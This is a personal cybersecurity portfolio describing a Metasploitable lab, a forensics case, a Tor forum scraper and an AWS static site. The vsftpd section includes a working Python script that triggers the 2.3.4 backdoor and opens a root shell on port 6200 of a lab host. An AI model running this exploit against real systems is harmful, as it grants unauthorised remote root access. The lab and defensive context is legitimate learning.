My name is Thomas Biryla and I am a recent graduate of Marist University. I received my Bachelor of Science in Cyber Security along with minors in Information Technology, Information Systems, and Computer Science. While attending Marist University I served as president and captain of the Men's Club Volleyball team, where I learned what it takes to lead a team and manage its logistics, such as the budget, to keep the program successful. I also enjoy researching and experimenting with new technical skills that I find online or encounter through the projects I work on.
During this project, I was assigned a virtual lab environment consisting of two VMs hosted in VMware: an attack box running Kali Linux and a defense box hosting Metasploitable 2, a purposely vulnerable Linux-based system used for penetration testing practice. My objective was to perform a controlled exploitation of a known vulnerable service and analyze both the attack vector and potential mitigation strategies.

I chose to investigate the vsftpd 2.3.4 backdoor exploit, a well-documented vulnerability present in Metasploitable. This version of vsftpd (Very Secure FTP Daemon) contains a deliberately inserted backdoor that activates when a client attempts to log in with a username containing a smiley face, ":)". When triggered, the service opens a shell on port 6200, granting the attacker unauthorized remote access to the system. Using the Metasploit Framework on Kali Linux, I launched the exploit by configuring the appropriate module (exploit/unix/ftp/vsftpd_234_backdoor) and targeting the Metasploitable IP address. Upon successful exploitation, I gained a remote shell, demonstrating how easily such a vulnerability could be abused in a real-world scenario if left unpatched.

As part of the defensive analysis, I explored multiple methods for mitigating the risk posed by FTP-related vulnerabilities like this one. The most direct mitigation I applied was disabling the FTP service entirely, which is appropriate in environments where it is not essential. I then recommended switching to SFTP (SSH File Transfer Protocol), which runs over the secure SSH protocol and provides encrypted file transfers, a significant improvement over plain-text FTP. However, my research also showed that simply disabling a service isn't always practical in production environments. Other mitigation strategies include using firewalls to restrict access to FTP ports, deploying intrusion detection systems (IDS) to monitor for unusual login attempts, updating or replacing outdated software with secure and actively maintained alternatives, and hardening configurations by disabling anonymous access and enforcing strong authentication.

This project reinforced my understanding of how vulnerable services can be exploited and, more importantly, how layered security and proactive system hardening are necessary to protect real-world systems from similar threats.
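For illustration, the sketch below reproduces in plain Python what the Metasploit module automates: sending an FTP login whose username contains ":)" and then connecting to the shell the backdoor opens on port 6200. The target IP address is a placeholder for the lab VM, and this should only ever be run against an isolated environment like Metasploitable.

```python
# Minimal sketch of the vsftpd 2.3.4 backdoor trigger, for use only against an
# isolated lab VM (the IP below is a placeholder, not a real target).
import socket
import time

TARGET = "192.168.56.101"  # placeholder Metasploitable 2 address

# Step 1: attempt an FTP login whose username contains ":)".
ftp = socket.create_connection((TARGET, 21), timeout=10)
ftp.recv(1024)                        # read the 220 FTP banner
ftp.sendall(b"USER lab:)\r\n")        # the ":)" suffix triggers the backdoor
ftp.recv(1024)                        # 331 password prompt
ftp.sendall(b"PASS anything\r\n")     # the password value does not matter

time.sleep(2)                         # give the daemon a moment to open port 6200

# Step 2: connect to the shell the backdoor bound to port 6200.
shell = socket.create_connection((TARGET, 6200), timeout=10)
shell.sendall(b"id\n")
print(shell.recv(4096).decode(errors="replace"))  # typically "uid=0(root) ..."

ftp.close()
shell.close()
```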
During this project, I worked collaboratively as part of a four-person digital forensics team tasked with investigating a simulated insider threat scenario within a fictional organization. Our objective was to determine whether a suspected employee had intentionally leaked sensitive company data. To ensure the integrity of our investigation, we began by creating a forensically sound image of the suspect's workstation using industry-standard tools such as FTK Imager and Autopsy. This process allowed us to preserve digital evidence in a manner that would be admissible in a real-world legal context.

Once the image was secured, we conducted a thorough forensic analysis of the system. This included reviewing system logs, browsing history, recent file access activity, USB device usage, and any encrypted or deleted files. We also searched for the presence of unauthorized software and for communications with external storage or email platforms. Throughout the investigation, we followed a structured workflow aligned with digital forensic methodologies, maintaining chain of custody and documentation at every step.

Our findings were compiled into a comprehensive forensic report detailing the evidence collected, the tools and techniques used, and our conclusions based on the digital artifacts recovered. The report showed that the suspect had indeed accessed and transferred confidential information without authorization, supporting the insider threat hypothesis. The project not only enhanced my technical skills in digital forensics but also emphasized the importance of teamwork, meticulous documentation, and adherence to legal and ethical standards in cybersecurity investigations.
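The specific verification steps are not described above, but as one example of the kind of integrity check that keeps an image forensically sound, the hypothetical sketch below recomputes a disk image's SHA-256 and compares it against the hash recorded at acquisition time. The file path and expected hash are placeholders, not artifacts from the actual investigation.

```python
# Hypothetical integrity check for an acquired disk image: recompute its SHA-256
# in chunks and compare it against the hash recorded at acquisition time.
# The file path and expected hash are placeholders, not real case artifacts.
import hashlib

IMAGE_PATH = "suspect_workstation.dd"                  # placeholder image file
EXPECTED_SHA256 = "replace-with-acquisition-hash"      # value logged by the imaging tool

def sha256_of_file(path: str, chunk_size: int = 1024 * 1024) -> str:
    """Hash a large file in chunks so the whole image never sits in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

computed = sha256_of_file(IMAGE_PATH)
print(f"Computed SHA-256: {computed}")
if computed == EXPECTED_SHA256:
    print("Hashes match: the image is unchanged since acquisition.")
else:
    print("Hash mismatch: the image may have been altered; document and investigate.")
```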
As part of a four-person team, I led the design, development, and deployment of a custom dark web scraping tool built to systematically extract user-generated content from three selected darknet forums and marketplaces. The tool was tailored specifically for environments hosted on the Tor network, which required routing traffic through a Tor proxy (e.g., 127.0.0.1:9050) to access .onion addresses safely and anonymously. To handle the unique structure and frequent instability of darknet sites, we implemented resilient scraping logic capable of navigating dynamic or inconsistently formatted HTML and handling common challenges such as CAPTCHA interruptions, session expirations, and site takedowns.

The tool was primarily built in Python, leveraging libraries such as BeautifulSoup and Requests (via a SOCKS5 proxy) and, for pages requiring JavaScript rendering, Selenium. Scraped data included usernames, post content, timestamps, thread titles, and marketplace listings. To support long-term use, we added structured JSON and CSV output for easy integration into existing security workflows; a condensed sketch of the core fetch-and-parse loop appears below. All scraped data was stored in a secure local database and analyzed using basic natural language processing (NLP) techniques to identify relevant threat indicators, such as keyword matches for malware, credential dumps, or illicit financial services.

This tool became a key asset for a broader cyber threat intelligence (CTI) initiative, enabling continuous and automated monitoring of high-risk darknet platforms. It allowed analysts to identify emerging cyber threats, track malicious actor behavior, and correlate activity across forums to support potential attribution. The project demonstrated technical proficiency in web scraping and secure networking, and it also required strong knowledge of threat intelligence operations, data privacy considerations, and the ethical boundaries of operating in dark web environments.
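The condensed sketch below shows one way the fetch-and-parse loop could look; the .onion URL, CSS selectors, and keyword list are placeholders rather than details of the actual tool, and it assumes a local Tor SOCKS5 proxy on 127.0.0.1:9050 with the requests SOCKS extra installed.

```python
# Simplified sketch of a Tor-based scraper loop. The .onion URL, CSS selectors,
# and keywords are placeholders; a local Tor proxy is assumed at 127.0.0.1:9050
# and Requests needs the SOCKS extra (pip install requests[socks]).
import json

import requests
from bs4 import BeautifulSoup

TOR_PROXIES = {
    "http": "socks5h://127.0.0.1:9050",   # socks5h resolves .onion names via Tor
    "https": "socks5h://127.0.0.1:9050",
}
FORUM_URL = "http://exampleforumxxxxxxxx.onion/latest"   # placeholder address
KEYWORDS = {"malware", "credential dump", "carding"}      # placeholder indicators

def fetch(url: str) -> str:
    """Fetch a page through Tor, returning its HTML (raises on HTTP errors)."""
    resp = requests.get(url, proxies=TOR_PROXIES, timeout=60)
    resp.raise_for_status()
    return resp.text

def parse_posts(html: str) -> list[dict]:
    """Extract author, title, timestamp, and body from each post block."""
    soup = BeautifulSoup(html, "html.parser")
    posts = []
    for post in soup.select("div.post"):                  # placeholder selector
        posts.append({
            "author": post.select_one(".author").get_text(strip=True),
            "title": post.select_one(".title").get_text(strip=True),
            "timestamp": post.select_one(".timestamp").get_text(strip=True),
            "body": post.select_one(".body").get_text(" ", strip=True),
        })
    return posts

def flag_threats(posts: list[dict]) -> list[dict]:
    """Keep only posts whose body mentions a watched keyword."""
    flagged = []
    for post in posts:
        body = post["body"].lower()
        post["matched_keywords"] = sorted(k for k in KEYWORDS if k in body)
        if post["matched_keywords"]:
            flagged.append(post)
    return flagged

if __name__ == "__main__":
    flagged = flag_threats(parse_posts(fetch(FORUM_URL)))
    with open("flagged_posts.json", "w", encoding="utf-8") as f:
        json.dump(flagged, f, indent=2)                   # structured JSON output
```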
As a personal project, I created and hosted a fully functional website on the AWS cloud platform. The process began with learning how to design and build a website from the ground up using HTML, CSS, and JavaScript. I used HTML to structure the content, CSS to style the layout and visual appearance, and JavaScript to add interactivity such as responsive menus and dynamic content. Since I was teaching myself as I built the site, I relied heavily on online resources including FreeCodeCamp, W3Schools, YouTube tutorials, and technical forums like Stack Overflow. These platforms helped me understand the fundamentals of front-end development and troubleshoot issues along the way.

Once the website was built and tested locally, I moved on to hosting it on Amazon Web Services (AWS). I began by creating an S3 (Simple Storage Service) bucket, where I uploaded my static site files, including the HTML, CSS, and JavaScript, along with any images and other assets. I enabled static website hosting in the bucket settings and set the proper permissions to make the content publicly accessible, allowing AWS to serve the website directly to users as a static site.

To connect the site to a custom domain, I used AWS Route 53, a scalable Domain Name System (DNS) service. I registered a domain through Route 53 and created a hosted zone to manage its DNS settings, then added an alias A record pointing the domain to the S3 bucket's website endpoint so users could reach the site through a personalized domain name. To ensure proper access and security, I also configured AWS Identity and Access Management (IAM) roles and policies, which let me control who could manage or view the S3 bucket and the other AWS resources involved in the project.

This project taught me how to code, deploy, and manage a live website independently. It significantly improved my understanding of both front-end development and cloud infrastructure, as I not only built the site from scratch but also learned how to navigate and leverage key AWS services such as S3, Route 53, and IAM through hands-on practice and online research.
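The setup above was done through the AWS console, but a rough boto3 sketch of the S3 portion might look like the following. The bucket name and file list are placeholders, and it assumes the bucket's Block Public Access settings have been relaxed so the public-read bucket policy can take effect.

```python
# Rough boto3 sketch of the S3 static-hosting setup described above. The bucket
# name and file list are placeholders; it assumes Block Public Access has been
# turned off for this bucket so the public-read policy below can apply.
import json

import boto3

BUCKET = "example-portfolio-site"         # placeholder bucket name
s3 = boto3.client("s3")

# Enable static website hosting with an index and error document.
s3.put_bucket_website(
    Bucket=BUCKET,
    WebsiteConfiguration={
        "IndexDocument": {"Suffix": "index.html"},
        "ErrorDocument": {"Key": "error.html"},
    },
)

# Attach a bucket policy granting public read access to the site objects.
policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicReadGetObject",
        "Effect": "Allow",
        "Principal": "*",
        "Action": "s3:GetObject",
        "Resource": f"arn:aws:s3:::{BUCKET}/*",
    }],
}
s3.put_bucket_policy(Bucket=BUCKET, Policy=json.dumps(policy))

# Upload the site files with content types so browsers render them correctly.
for filename, content_type in [
    ("index.html", "text/html"),
    ("styles.css", "text/css"),
    ("app.js", "application/javascript"),
]:
    s3.upload_file(filename, BUCKET, filename, ExtraArgs={"ContentType": content_type})

# The resulting website endpoint (region-dependent) looks like:
# http://example-portfolio-site.s3-website-us-east-1.amazonaws.com
```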